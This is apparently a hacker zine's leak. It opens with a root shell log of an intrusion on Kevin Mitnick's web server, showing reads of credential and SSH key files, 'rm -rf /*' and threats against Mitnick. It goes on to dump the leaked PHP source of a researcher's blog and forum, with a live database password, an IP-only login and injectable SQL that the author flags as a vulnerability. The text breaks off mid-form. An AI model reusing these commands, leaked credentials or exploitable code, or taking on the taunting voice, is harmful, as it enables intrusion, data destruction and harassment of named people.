-rwxr-xr-x  1 mitsec mitsec 80357704 Feb  8  2008 Bloomberg1.wmv
-rwxr-xr-x  1 mitsec mitsec 97313195 Feb  6  2008 Bloomberg2.mp4
-rwxr-xr-x  1 mitsec mitsec 78221632 Feb  8  2008 Bloomberg2.wmv
-rwxr-xr-x  1 mitsec mitsec 97840298 Feb  6  2008 Bloomberg3.mp4
-rwxr-xr-x  1 mitsec mitsec 78549644 Feb  8  2008 Bloomberg3.wmv
-rwxr-xr-x  1 mitsec mitsec   729350 Jul 24  2007 CSC-Testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec    60537 Jan 22  2005 HFSC-Testimony-20030403.pdf
-rwxr-xr-x  1 mitsec mitsec 72885850 Jan 31  2008 InterviewWithMariFrank.mp3
-rwxr-xr-x  1 mitsec mitsec   211536 Jul 29  2007 Kevin_Mitnick_Bio_BW.pdf
-rwxr-xr-x  1 mitsec mitsec 73025457 Nov 11  2005 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec  5659648 Jan 17  2005 Mitnick_Color.zip
-rwxr-xr-x  1 mitsec mitsec  2547699 Jul 24  2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x  1 mitsec mitsec  5144656 Jan 17  2005 Mitnick_bw.zip
-rwxr-xr-x  1 mitsec mitsec 86455159 Feb  6  2008 Quest Interview.mp4
-rwxr-xr-x  1 mitsec mitsec 69397314 Feb  8  2008 Quest Interview.wmv
-rwxr-xr-x  1 mitsec mitsec    72399 Jan 22  2005 SGAC-Testimony-20000302.pdf
-rwxr-xr-x  1 mitsec mitsec 51160350 Feb  6  2008 Star Jones Interview.mp4
-rwxr-xr-x  1 mitsec mitsec 41092294 Feb 13  2008 Star Jones Interview.wmv
-rwxr-xr-x  1 mitsec mitsec 41092294 Feb  8  2008 Star Jones.wmv
-rwxr-xr-x  1 mitsec mitsec    18229 Dec 14  2005 THE ART OF
INTRUSION_Press_Kit.zip
-rwxr-xr-x  1 mitsec mitsec   718004 Mar 28  2005 The_Age.pdf
-rwxr-xr-x  1 mitsec mitsec 33177621 Oct 20  2005 Trinidad.wmv
-rwxr-xr-x  1 mitsec mitsec   117138 Mar  1  2008 US-pretrial.pdf
-rwxr-xr-x  1 mitsec mitsec    50087 Jan 17  2005 aod_pk_v1-0.zip
-rwxr-xr-x  1 mitsec mitsec 27561886 Jan 17  2005 artofdeceptionshort.wmv
-rwxr-xr-x  1 mitsec mitsec   388671 Jan 20 16:51 cic-testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec   384144 Jul 24  2007 faa.pdf
-rwxr-xr-x  1 mitsec mitsec	  52 Jan 17  2005 index.php
-rwxr-xr-x  1 mitsec mitsec    18794 Aug 10  2007 infragard.pdf
-rwxr-xr-x  1 mitsec mitsec  1515582 Jul 24  2007 issa.jpg
-rwxr-xr-x  1 mitsec mitsec 38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec 18084536 Mar 19  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec    32359 Jan 17  2005 msc_brochure.pdf
-rwxr-xr-x  1 mitsec mitsec    46449 Jan 17  2005 msc_course_outline.pdf
-rwxr-xr-x  1 mitsec mitsec  3948582 Aug 19  2007 pick-cards.mov
-rwxr-xr-x  1 mitsec mitsec 40543570 Aug 19  2007 pick-cards.wmv
-rwxr-xr-x  1 mitsec mitsec    28169 Jul 24  2007 ssa.pdf
root@dc21 [~]# ls -la dev
total 208
drwxr-xr-x  5 mitsec mitsec  4096 Sep  1  2008 .
drwxr-xr-x 24 mitsec nobody  4096 Jul  9 10:01 ..
-rwxr-xr-x  1 mitsec mitsec   123 Oct 20  2007 .htaccess
-rwxr-xr-x  1 mitsec mitsec  1038 Oct 20  2007 _contact_settings.php
-rwxr-xr-x  1 mitsec mitsec   528 Aug  1  2007 _footer.php
-rwxr-xr-x  1 mitsec mitsec  3121 Aug  1  2007 _header.php
-rwxr-xr-x  1 mitsec mitsec 11023 Aug  7  2007 _sidebar.php
-rwxr-xr-x  1 mitsec mitsec  2798 Jul 24  2007 aoi_reviews.php
drwxr-xr-x  2 mitsec mitsec  4096 Sep  1  2008 cache
-rwxr-xr-x  1 mitsec mitsec  2870 Jul 23  2007 company.php
-rwxr-xr-x  1 mitsec mitsec  1778 Jul 29  2007 contact.php
-rwxr-xr-x  1 mitsec mitsec  1054 Jul 24  2007 contact_confirmation.php
-rwxr-xr-x  1 mitsec mitsec 50245 Jul 24  2007 contact_form.php
-rwxr-xr-x  1 mitsec mitsec  2839 Jul 24  2007 error_log
drwxr-xr-x  2 mitsec mitsec  4096 Sep  1  2008 images
-rwxr-xr-x  1 mitsec mitsec  3627 Aug  7  2007 index.php
-rwxr-xr-x  1 mitsec mitsec  1440 Jul 23  2007 investigations.php
-rwxr-xr-x  1 mitsec mitsec  8793 Jul 24  2007 lastRSS.php
-rwxr-xr-x  1 mitsec mitsec  7120 Jul 23  2007 presentations.php
-rwxr-xr-x  1 mitsec mitsec  4991 Jul 29  2007 press.php
-rwxr-xr-x  1 mitsec mitsec  3111 Jul 23  2007 products.php
-rwxr-xr-x  1 mitsec mitsec  1738 Jul 23  2007 resources.php
-rwxr-xr-x  1 mitsec mitsec  8172 Jul 29  2007 services.php
-rwxr-xr-x  1 mitsec mitsec  5225 Aug  1  2007 speaking.php
-rwxr-xr-x  1 mitsec mitsec  2430 Jul 24  2007 style.css
-rwxr-xr-x  1 mitsec mitsec  2043 Aug  7  2007 testimonials.php
-rwxr-xr-x  1 mitsec mitsec  1981 Jul 24  2007 video.php
-rwxr-xr-x  1 mitsec mitsec  3036 Jul 29  2007 workshop_signup.php
-rwxr-xr-x  1 mitsec mitsec   888 Jul 24  2007 workshop_signup_confirmation.php
-rwxr-xr-x  1 mitsec mitsec  1208 Jul 23  2007 workshops.php
drwxr-xr-x  8 mitsec mitsec  4096 Sep  1  2008 zzhp
root@dc21 [~]# cat dev/.htaccess 
AuthType Basic
AuthName "Restricted Area"
AuthUserFile "/home/mitsec/.htpasswds/public_html/dev/passwd"
require valid-user
root@dc21 [~]# cat /home/mitsec/.htpasswds/public_html/dev/passwd 
root@dc21 [~]# cat dev/index.php 
<?php require("_header.php"); ?>
<!-- Copy begins  -->

<strong>Mitnick Security Consulting, LLC</strong> is a full-service information

security consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting

offers a comprehensive range of services to help businesses protect their
valuable 
assets. Mitnick Security Consulting, LLC is a full-service information security

consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting offers 
a comprehensive range of services. <a href="company.php">read more >></a></div>

<div class="bdtxt" style="background-color: #F4F4F4;"><strong>FBI Computer
Crime Survey</strong><br>
&#8220;This computer security survey eclipses any other that I have ever seen. 
After reading it, everyone should realize the importance of establishing a
proactive 
information security program.&#8221; - Kevin Mitnick<br>
<a href="media/2005%20FBI%20Computer%20Crime%20Survey%20Report.pdf">Click Here 
To Download The Report</a><br></div>

<p align="center"><img src="images/br-top.png" width="506" height="10"></p>
		<div class="quote">"Mitnick left his audience shaken,but better
equipped to stave off attacks via social engineering."</div>
		
<div class="quote-att">- Computer Sciences Corporation (<a
href="media/CSC-Testimonial.pdf">Click 
  Here for PDF</a>)</div>
      <br>
		<div class="quote">"It's both frightening and informative to
hear how effective social engineering can be in assessing what should be
security sensitive information."</div>
		
<div class="quote-att">- Scott Pettit - The AIM Institute (<a
href="media/Applied_Scan2.pdf">Click 
  Here for PDF</a>)</div>
<div class="bdtxt"><a href="testimonials.php">Read more testimonials
>></a></div>
  
<p align="center"><img src="images/br-bot.png" width="506" height="10"></p>
	  
<div class="bdtxt"><strong><a href="workshop_signup.php">2007 Las Vegas Social 
  Engineering Workshop</a></strong><br>
	A two-day course covering:<br>
	- Social engineering case studies, attack methods, vulnerabilities in 
	the human firewall, and techniques to protect your business <br>
	- Security policies development, follow-through, assessment, and
training 
	<br>
	<br>
  <a href="workshop_signup.php">Sign up now >></a></div>
	<p align="center"><img src="images/br-top.png" width="506"
height="10"></p>
		
		
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
	<tr valign="top"> 
	  <td width="50%"><div class="bdtxt"><img
src="images/art-of-intrusion-cover.jpg" width="100" height="152" hspace="5"
align="left"><strong>The 
	      Art of Intrusion:</strong><br>
	      The Real Stories Behind the Exploits of Hackers, Intruders, and 
	      Deceivers<br>
	    <br>
	      [ <a
href="http://www.amazon.com/exec/obidos/tg/detail/-/0764569597/ref=ase_mitnicks
ecuri-20/103-6052457-8135069?v=glance&s=books">More 
	      Information</a> ]<br>
	      [ <a href="aoi_reviews.php">Read The Press Reviews</a>
]</div></td>	  
	  <td><div class="bdtxt"><img src="images/art-of-deception-cover.jpg"
width="100" height="151" hspace="5" align="left"><strong>The 
	      Art of Deception:</strong><br>
	      Controlling the Human Element of Security<br>
	      <br>
	      [ <a
href="http://www.amazon.com/exec/obidos/tg/detail/-/0471237124/ref=ase_mitnicks
ecuri-20/103-6052457-8135069?v=glance&s=books">More 
	      Information</a> ]</div></td>
  </tr>
</table>

		




<!-- Copy ends -->

<?php require("_sidebar.php"); ?>

<?php require("_footer.php"); ?>
root@dc21 [~]# ls -la /home/mitsec/.ssh/
total 16
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 .
drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 authorized_keys
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 authorized_keys2
-rwxr-xr-x  1 mitsec mitsec  744 Oct 20  2007 id_dsa
-rwxr-xr-x  1 mitsec mitsec  615 Oct 20  2007 id_dsa.pub
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 known_hosts
toproot@dc21 [~]# cat /etc/userdomains
kevinmitnick.com: mitsec
defthi.com: mitsec
defthi.mitnicksecurity.com: mitsec
mitnicksecurity.com: mitsec
mitsec.com: mitsec
defensivethinking.com: mitsec
*: nobody
root@dc21 [~]# #good bye kevin
root@dc21 [~]# rm -rf /* 
/dev/rm2: cannot remove `/dev/pts/0': Operation not permitted
[ snip ]
root@dc21 [/dev]# logout
Connection to www.kevinmitnick.com closed by remote host.
Connection to www.kevinmitnick.com closed.

Apologies for the poor quality of the hacklog, but I'm old now and let's face
it, Kevin Mitnick is done. You can move your box anywhere Kevin, we'll find you
and own you. You should know best, it's the "hacker" in us - or something like
that...See you soon.



                                           |
                                       \       /            _\/_
     0x000000/rvdh                       .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     I'm out of my head                                             |
       That was what they said
         There was no way that I would
           Ever trust again

As far as whitehats go Ronald is a pretty nice guy. Sometimes you find yourself
respecting a guy for the way he goes about his shit, Ronald is that kinda guy.
The comparison with the no talent asshat rsnake is obvious - both "specialize"
in this new form of security - "WEB APPLICATION SECURITY". Ronald was never
about the money, whereas rsnake is all about the hype, the drama, and seeing
his name in lights. Ronald quit the security scene some time ago, and despite
creating a new site it has been idle for a long time. So rather than let this
information go to waste, I figured I would share the security secrets of his
CMS/blog.

Let's start with his index.php. I hope no one hosts this zine with a .php
extension, they'd be as owned as Ronald.

<?
include("stats.php");

if($_REQUEST['!']) {

    $xor = (int)$_REQUEST['!'];
    
    switch($xor) {
    
    case 4:
    $uri = 'archive.php';
    break;
    case 6:
    $uri = 'about.php';
    break;
    case 7:
    $uri = 'contact.php';
    break;
    default:
    $uri = 'err.php';
    break;
    }
}


function nl2br_pre($string, $wrap = 100) {
  $string = nl2br($string);

  preg_match_all("/<pre[^>]*?>(.|\n)*?<\/pre>/", $string, $pre1);

  for ($x = 0; $x < count($pre1[0]); $x++) {
    $pre2[$x] = preg_replace("/\s*<br[^>]*?>\s*/", "\r\n", $pre1[0][$x]);
    $pre1[0][$x] = "/".preg_quote($pre1[0][$x], "/")."/";
  }

  return preg_replace($pre1[0], $pre2, $string);
}

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>0x000000 Hacking & Security, cuz Web 2.0 is kitsch</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noarchive">
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="wrapper">
<h1>rvdh 
  <p>Hacking & Security</p></h1>
<div align="left" id="menu"><a href="index.php" class="link">index</a> <a
href="index.php?!=4" class="link">archive</a> <a href="rss.php"
class="link">rss</a></div>
<div id="content" align="left">
  <? 
if($_REQUEST['i']) {
if(is_numeric($_REQUEST['i'])) {
$get = (int)$_REQUEST['i'];
$sql = "SELECT * FROM blog WHERE id = '".mysql_real_escape_string($get)."'
LIMIT 1";
$res = mysql_query($sql) or die();
while($r=mysql_fetch_array($res)) {
?>
  <br />
  <table width="100%" border="0" cellspacing="0" cellpadding="3">
    <tr>
      <td width="80%"><h3>
	 <a href="index.php?i=<?=$r['id']; ?>" alt="Posted on:
<?=$r['date'];?>" title="Posted on: <?=$r['date'];?>"><?=$r['title'];?></a>
	</h3>
	</td>
      <td width="20%" valign="bottom"><div align="right"><a
href="index.php?i=<? if($get == '') { echo '1'; } else { echo ($get-1); } ?>"
class="arrow">&#8594; </a></div></td>
    </tr>
  </table>
  <br />
  <?
echo nl2br(stripslashes($r['article']));
echo $r['code1']; 
if($r['code2']) { echo stripslashes($r['code2']).$r['code3'];  }
?>
  <br />
  <table width="100%" border="0" cellspacing="0" cellpadding="3">
    <tr>
      <td width="80%"></td>
      <td width="20%" valign="bottom"><div align="right"><a
href="index.php?i=<? if($get == '') { echo '1'; } else { echo ($get-1); } ?>"
class="arrow">&#8594; </a></div></td>
    </tr>
  </table>
  <?
}
} 
}  elseif($_REQUEST['!']) {
	  @include($uri);
} else {

$get = (int)$_REQUEST['i'];
$sql = "SELECT * FROM blog ORDER BY id DESC LIMIT 1";
$res = mysql_query($sql) or die();
while($r=mysql_fetch_array($res)) {
?>
  <br />
  <table width="100%" border="0" cellspacing="0" cellpadding="3">
    <tr>
      <td width="80%"><h3>
	  <a href="index.php?i=<?=$r['id']; ?>" alt="Posted on:
<?=$r['date'];?>" title="Posted on: <?=$r['date'];?>"><?=$r['title'];?></a>
	</h3>
</td>
      <td width="20%" valign="bottom"><div align="right"><a
href="index.php?i=<?= ($r['id'] -1); ?>"  class="arrow">&#8594; </a></div></td>
    </tr>
  </table>
  <br />
  <?
echo stripslashes(nl2br($r['article']));
echo $r['code1']; 
if($r['code2']) { echo stripslashes($r['code2']).$r['code3'];  }
?>
  <br />
  <table width="100%" border="0" cellspacing="0" cellpadding="3">
    <tr>
      <td width="80%"></td>
      <td width="20%" valign="bottom"><div align="right"><a
href="index.php?i=<?= ($r['id'] -1); ?>"  class="arrow">&#8594; </a></div></td>
    </tr>
  </table>
  <?
}
}
?>
</div>
<br />
<script type="text/javascript"><!--
google_ad_client = "pub-4603962989172802";
google_ad_slot = "0213361181";
google_ad_width = 700;
google_ad_height = 67;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<br />
<div id="acunetix_element"
style="width:100px;float:right;margin-top:10px;top:0px;
left:690px;position:absolute;"><a
href="http://www.acunetix.com/cross-site-scripting/scanner.htm"
target="_blank"><img src="125x125freexssa.gif" border="0" alt="free websecurity
scanner" /></a></div>
</div>
</body>
</html>

$ head -n 50 x/processor.php
<?php

$chk  = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['REMOTE_HOST'];
$ua   = $_SERVER['HTTP_USER_AGENT'];
# process login
if($chk !== "82.171.76.240") {
die("Dream on.");
}

if($chk != "82.171.76.240") {
die("Dream on.");
}


// local DB

    $dbHost = "localhost";
    $dbBase = "xtheory";
    $dbUser = "blogger2";
    $dbPass = "1uZ5UoZOL8";
    $dbLink = mysql_connect($dbHost, $dbUser, $dbPass) or die(mysql_error());
	mysql_select_db($dbBase) or die(mysql_error());
?>
<?

if($_REQUEST['up'] === "true") {

$titlex = $_REQUEST['title'];
$longx	= addslashes($_REQUEST['long']);
$sqlvar = htmlentities($longx, ENT_QUOTES);
$datex	= $_REQUEST['date'];
$hashx	= $_REQUEST['hash'];
$pagex	= $_REQUEST['page'];
$code1	= $_REQUEST['code1'];
$c2	= addslashes($_REQUEST['code2']);
$code2	= htmlentities($c2, ENT_QUOTES);
$code3	= addslashes($_REQUEST['code3']);
$sql = "INSERT INTO blog set title = '".$titlex."', article = '".$sqlvar."',
date = '".$datex."', hash = '".$hashx."', page = '".$pagex."', code1 =
'".$code1."', code2 = '".$code2."', code3 = '".$code3."'";
echo $sql;
$res = mysql_query($sql) or die(mysql_error());
echo "Ok!";
die();
}
# login for my blog
# there is only me.
$chk  = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['REMOTE_HOST'];
$ua   = $_SERVER['HTTP_USER_AGENT'];
# process login


/*********************************************************
*
* Gotta love that extensive checking, != and !== ...
*
* Heres a challenge for you, spot the vuln!
*
*********************************************************/

<script>
function show(value) {
document.getElementById('img').innerHTML = '<img src="'+value+'" border="0"
width="70" height="70">';
}
</script>
<?

function flood($sid,$userid) {

$sql = mysql_query("select timer from posts where sid = '".$sid."' and userid =
'".$userid."'");
    while($g=mysql_fetch_array($sql)) {
    
    if(time() - $g['timer'] < 20 ) {
    die('(!) Flooding detected, wait...');
    }
}

}

function flood2($catid,$uid) {

$sql = mysql_query("select timer from topics where catid = '".$catid."' and uid
= '".$uid."' order by id DESC limit 1");
    while($g=mysql_fetch_array($sql)) {
    
    if(time() - $g['timer'] < 150 ) {
    die('(!) Flooding detected, wait...');
    }
}

}

function BBCode ($string) {

$search = array(
       
"/\[url\]((http|https|ftp|mailto):\/\/([a-z0-9\.\-@:]+)[a-z0-9;\/\?:@=\&\$\-_\.
\+!*'\(\),\#%~ ]*?)\[\/url\]/is",
       
"/\[url=((http|https|ftp|mailto):\/\/[a-z0-9;\/\?:@=\&\$\-_\.\+!*'\(\),~%#
]+?)\](.+?)\[\/url\]/is",
       
"/\[url=\]((http|https|ftp|mailto):\/\/[a-z0-9;\/\?:@=\&\$\-_\.\+!*'\(\),~%#
]+?)\[\/url\]/is",
       
"/\[email\]([a-z0-9\-_\.\+]+@[a-z0-9\-]+\.[a-z0-9\-\.]+?)\[\/email\]/ies",
	"/\[b\](.+?)\[\/b\]/is",
	"/\[u\](.+?)\[\/u\]/is",
	"/\[i\](.+?)\[\/i\]/is",
	"/\[s\](.+?)\[\/s\]/is",
	"/\[center\](.+?)\[\/center\]/is",
	"/\[hr\]/i",
	"/\[code\](.+?)\[\/code\]/is",
	"/\[sub\](.+?)\[\/sub\]/is",
	"/\[sup\](.+?)\[\/sup\]/is",
);
$replace = array(
	"<p>[<a href=\"$1\">$3</a>]</p>",
	"<p><a href=\"$1\">$3</a></p>",
	"<p><a href=\"$1\">$1</a></p>",
	"<p>'<a href=\"'.encode('mailto:$1').'\">'.encode('$1').'</a>'</p>",
	"<strong>$1</strong>",
	"<u>$1</u>",
	"<i>$1</i>",
	"<s>$1</s>",
	"<center>$1</center>",
	"<hr />",
	"<pre class='q'>$1</pre>",
	"<sub>$1</sub>",
	"<sup>$1</sup>",
);
    
$new = preg_replace($search , $replace, $string);
return $new; 
}

function rplace($data) {

    
    $data = BBcode($data);

$data = str_replace('8(',' <img src="smiles/8(.png" border="0"> ',$data);
$data = str_replace('8)',' <img src="smiles/8).png" border="0"> ',$data);
$data = str_replace('8p',' <img src="smiles/8p.png" border="0"> ',$data);
$data = str_replace('8s',' <img src="smiles/8s.png" border="0"> ',$data);
$data = str_replace('-cool',' <img src="smiles/-cool.png" border="0"> ',$data);
$data = str_replace('-ehm',' <img src="smiles/-ehm.png" border="0"> ',$data);
$data = str_replace('-emo(',' <img src="smiles/-emo(.png" border="0"> ',$data);
$data = str_replace('-evil',' <img src="smiles/-evil.png" border="0"> ',$data);
$data = str_replace('-fu',' <img src="smiles/-fu.png" border="0"> ',$data);
$data = str_replace('-good',' <img src="smiles/-good.png" border="0"> ',$data);
$data = str_replace('-orly;)',' <img src="smiles/-orly;).png" border="0">
',$data);
$data = str_replace('-ok',' <img src="smiles/-ok.png" border="0"> ',$data);

return $data;
}


function wrap($datas) {

    $buffer = 33;
    $break  = ' ';
    $wrapped = false;

$aa = array('/<script>/','/<\/script>/','/%3E%3Cscript/');
$bb = array(' <script>',' </script>',' %3E%3Cscript');

$data = preg_replace($aa,$bb,$datas);

    $tmp = explode(' ', $data);
    
    foreach($tmp as $word) {
    
       while($w = $word[$buffer++]) {
	    $strbf = $w; 
	}
	
    if(preg_match("/(<a href)/i", $word)){
    $yikes = false;
    }
	
	if($strbf && $yikes) {
	    $abc = false;
	    for( $i=0; $i < 33; $i++ ) {
		$abc  .= $word[$i];
	    }
	    
	    $split = false;
	    for( $j = 33; $j < strlen($word); $j++ ) {
		$split .= $word[$j];
	    }
	    
	$wrapped .= $abc . $break . $split;
	$buffer = 34;
	
	} else {
	$strbf = false;
	$wrapped .= ' '. $word;
	}
    }


return $wrapped;

}

# encode data
function encode($data) {
    return htmlspecialchars($data,ENT_QUOTES,'UTF-8');
}

# prepare data for database
function prepare($data,$buffer,$string,$truncate,$escape) {
    
    $input = ($data) ? true : false;
    $buffer_message = 'Error: a problem was found, please try again or abort.';
    
    if($input) {
	
	while($tmp = $data[$buffer++]) {
	    
	    $strbf = $tmp; 
	}
	
	if($strbf && !$truncate) {
	    
	    echo $buffer_message;
	    exit;
	    
	} elseif ($truncate) {
	    
	    $dat = false;
	    
	    for($i=0;$i<($buffer-1);$i++) {
		
		$pre = $data[$i];
		$dat .= $pre;
	    }
	    
	    $prepr = ($string) ? $dat : (int) $dat;
	    $processed = ($escape) ? mysql_real_escape_string($prepr) : $prepr;
	    
	} else {
	    
	    $prepr = ($string) ? $data : (int) $data;
	    $processed = ($escape) ? mysql_real_escape_string($prepr) : $prepr;

	}
    } else {
	$processed = false;
    }
    
    return $processed;
}

function check() {

$run = explode(',',$_COOKIE['guid']);

	$p = prepare($run[2],250,true,false,true);
	$u = prepare($run[1],150,true,false,true);
	$sql = mysql_query("select * from users where user = '".$u."' and pass
= '".$p."'");
	
	    if(mysql_num_rows($sql) >0) {
	    session_start();
	    $_SESSION['login'] = 1;
	    while($m=mysql_fetch_array($sql)) {
	    $username = encode($m['user']);
	    ?>
	    <script>
	    y('guid','<?= unique().','.$username.','.sha1($p);?>');
	    </script>
<?
	    }
	}
    }


function image($val) {

$val = preg_replace("/..\//",' ',$val);

if(preg_match("/(\.p|\.j|\.h|\.a|\.x|\.s|..\/|\(|\)|http|ftp|\/\/|www|eval|data
:|script|>|<|\'|\"|\-|\+|\$|\`|;|{|}|system|php|&#|java|xss|%3C|%3E|minutemaid|
cookie|alert|string)/i", $val)){
    $img = false;
    } else {
    $img =
(eregi("^([a-zA-Z].*|[1-9].*)\.(((j|J)(p|P)(g|G))|((g|G)(i|I)(f|F)))$", $val))
? true:false;
    }
    
if($img === false) {
    $img = 'hacked.gif';
    }
if (file_exists('avatars/'.escapeshellcmd($img))) {
    return escapeshellcmd($img);
    } else {
    return 'hacked.gif';
    }
}


# uniqueid
function unique(){ 
    $u =
uniqid(mt_rand(0,65350),(int)str_replace('.','',$_SERVER['REMOTE_ADDR']).mt_ran
d(0,65350));
    for($i=0;$i<15;$i++) {
	$tmp = $u[$i];
	$uid .= $tmp;
    }
    return substr(md5($uid),0,7);
}

function hex($str) 
{ 
  if (trim($str)!="") 
  { 
    $hex=""; 
    $length=strlen($str); 
    for ($i=0; $i<$length; $i++) 
    { 
      if ($i>0) $bound=":"; else $bound=""; 
      $hex.=$bound.str_pad(dechex(ord($str[$i])), 2, 0, STR_PAD_LEFT); 
    } 
    return $hex; 
  } 
}

if($_REQUEST['members'] && $_SESSION['login'] && $_COOKIE['guid'] &&
$_COOKIE['forum']) {
?>

<table width="100%" border="0" cellspacing="1" cellpadding="3"	>
  <tr>
    <td width="6%" >Avatar</td>
    <td width="21%" >Nickname</td>
    <td width="24%" >Company</td>
    <td >Website</td>
  </tr>
  <?
$sql = mysql_query("select * from users order by user ASC");
$i = 0;
while($c=mysql_fetch_array($sql)) {

$avx = $c['avatar'];
if(preg_match("/(\.php|\.js|\.html|\.asp|http|www|\.com|wtf|\-|\_|\+|\=|minutem
aid|javascript|script|>|<|\'|\"|java|xss|%3C|%3E)/i", $avx)){
$av =  'hacked.gif';
}elseif (file_exists('avatars/'.escapeshellcmd($c['avatar']))) {
$av =  $c['avatar'];
} else {
$av =  'hacked.gif';
}
    echo ($i % 2) ? "<tr bgcolor=\"#ffffff\">" : "<tr bgcolor=\"#f7f7f7\">";
?>
    <td class="cb"><? 
    if($av) { 
    echo  "<img src=http://www.0x000000.com/avatars/".$av." width=\"30\"
height=\"30\" border=\"0\">"; 
    } else { 
    echo "<img src=\"no.gif\" height=\"30\" width=\"30\" border=\"0\">"; 
    } 
?>    </td>
    <td class="cb"><?=encode(stripslashes($c['user']));?></td>
    <td class="cb"><?=encode(stripslashes($c['company']));?></td>
    <td class="cb"><?=encode(stripslashes($c['link']));?></td>
    </tr>
  <?
++$i;
}
?>
</table>
<?
}

if($_REQUEST['settings'] && $_SESSION['login'] && $_COOKIE['guid'] &&
$_COOKIE['forum']) {

$run = explode(',',$_COOKIE['guid']);
    $p = prepare($run[2],250,true,false,true);
    $u = prepare($run[1],150,true,false,true);
    $sql = mysql_query("select * from users where user = '".$u."' and pass =
'".$p."' limit 1");
    while($r=mysql_fetch_array($sql)) {
?>
<form action="index.php?!=1&set=true&toc=<?=unique();?>" method="post"
name="set" id="set">
  <table width="100%" border="0" cellspacing="1" cellpadding="3" >
    <tr>
      <td colspan="3" class="cb"><strong>Settings</strong></td>
    </tr>
    <tr>
      <td width="19%" class="cb">Name:</td>
      <td colspan="2" class="cb"><input type="text" name="name" 
style="color:#fffff;" value="<?=$r['name'];?>" />
      </td>
    </tr>
    <tr>
      <td class="cb">Company:</td>
      <td width="48%" class="cb"><input type="text" name="company"
style="color:#fffff;" value="<?=$r['company'];?>"/></td>
      <td width="33%" rowspan="4" class="cb"><div id="img"></div></td>
    </tr>
    <tr>
      <td class="cb">E-mail:</td>
      <td class="cb"><input type="text" name="email" style="color:#fffff;"
value="<?=$r['email'];?>"/></td>
    </tr>
    <tr>
      <td class="cb">Website:</td>
      <td class="cb"><input type="text" name="website" style="color:#fffff;"
value="<?=$r['link'];?>"/></td>
    </tr>
    <tr>
      <td class="cb">Signature:</td>
      <td class="cb"><input type="text" name="sig" style="color:#fffff;"
value="<?=$r['sig'];?>"/></td>
    </tr>
    <tr>
      <td class="cb">Avatar:</td>
      <td class="cb" colspan=3><select name="avatar" id="select"
style="color:#fffff;"
onchange="show('http://www.0x000000.com/avatars/'+this.value);">
	  <option value="<?=$r['avatar'];?>"
onmouseover="show('http://www.0x000000.com/avatars/<?=$r['avatar'];?>');"
style="color:#fffff;">
	  <?=$r['avatar'];?>
	  </option>
	  <option value=""
style="color:#fffff;">----------------------</option>
	  <option value="" style="color:#fffff;"> all available
avatars</option>
	  <option value=""
style="color:#fffff;">----------------------</option>
	  <?	 
if ($h = opendir('avatars/')) {
	while (false !== ($file = readdir($h))) {
	if ($file != "." && $file != "..") {
echo "<option value='$file'
onmouseover=\"javascript:show('http://www.0x000000.com/avatars/".encode($file).
"');\" style=\"color:#fffff;\">".encode($file)."</option>";
	   }
       }
     closedir($h);
    } else {
    echo "error!";
}
?>
	</select>
      </td>
    </tr>
    <tr>
      <td class="cb">&nbsp;</td>
      <td colspan="2" class="cb"><input type="submit" name="button" value="Save
settings" style="color:#fffff;"/>
      </td>
    </tr>
  </table>
</form>
<?
}
}

if($_REQUEST['set'] && $_COOKIE['guid'] && $_COOKIE['forum'] &&
$_REQUEST['name'] && $_REQUEST['email']  && $_SESSION['login']) {

    if(image($_REQUEST['avatar'])) {
    
	$run = explode(',',$_COOKIE['guid']);
	$p = prepare($run[2],150,true,false,true);
	$u = prepare($run[1],150,true,false,true);
	$sql = mysql_query("select * from users where user = '".$u."' and pass
= '".$p."' limit 1");
	
	if(mysql_num_rows($sql) >0 ) {
	
	while($m=mysql_fetch_array($sql)) {    
	    $sql = mysql_query("update users set name =
'".prepare(encode($_REQUEST['name']),150,true,false,true)."',  
	    company =
'".prepare(encode($_REQUEST['company']),150,true,false,true)."', 
	    email =
'".prepare(encode($_REQUEST['email']),150,true,false,true)."',	
	    link =
'".prepare(encode($_REQUEST['website']),40,true,false,true)."', 
	    avatar =
'".prepare(encode($_REQUEST['avatar']),150,true,false,true)."',
	    sig =  '".prepare(encode($_REQUEST['sig']),250,true,false,true)."'
	    where id = '".$m['id']."'");
	    echo "<div class=\"green\">Updated!</div><br><br>";
	    }
	}
    } else { echo "(!) No image, probably a wrong file format.<br><br>";}
}

if($_REQUEST['newtopic'] && $_SESSION['login']) {

if($_SESSION['login']) {
    $item = explode('|',$_REQUEST['newtopic']);
    $id = (int) $item[1];
?>
<br />
<form action="index.php?!=1&topic=<?=hex(unique());?>|<?=$id;?>"
method="post" name="reply" id="reply">
  <table width="100%" border="0" cellspacing="1" cellpadding="3"  >
    <tr>
      <td width="55%" class="cb"><strong>New topic</strong> <br />
	<br />
	<input type="text" name="name" size="60" value=""
style="color:#fffff;"/></td>
      <td width="45%" class="cb">&nbsp;</td>
    </tr>
    <tr>
      <td colspan="2" class="cb">bbcode: [url=url]text[/url] - [b][/b] [i][/i]
[u][/u] [s][/s] [hr] [code][/code] [sub][/sub]
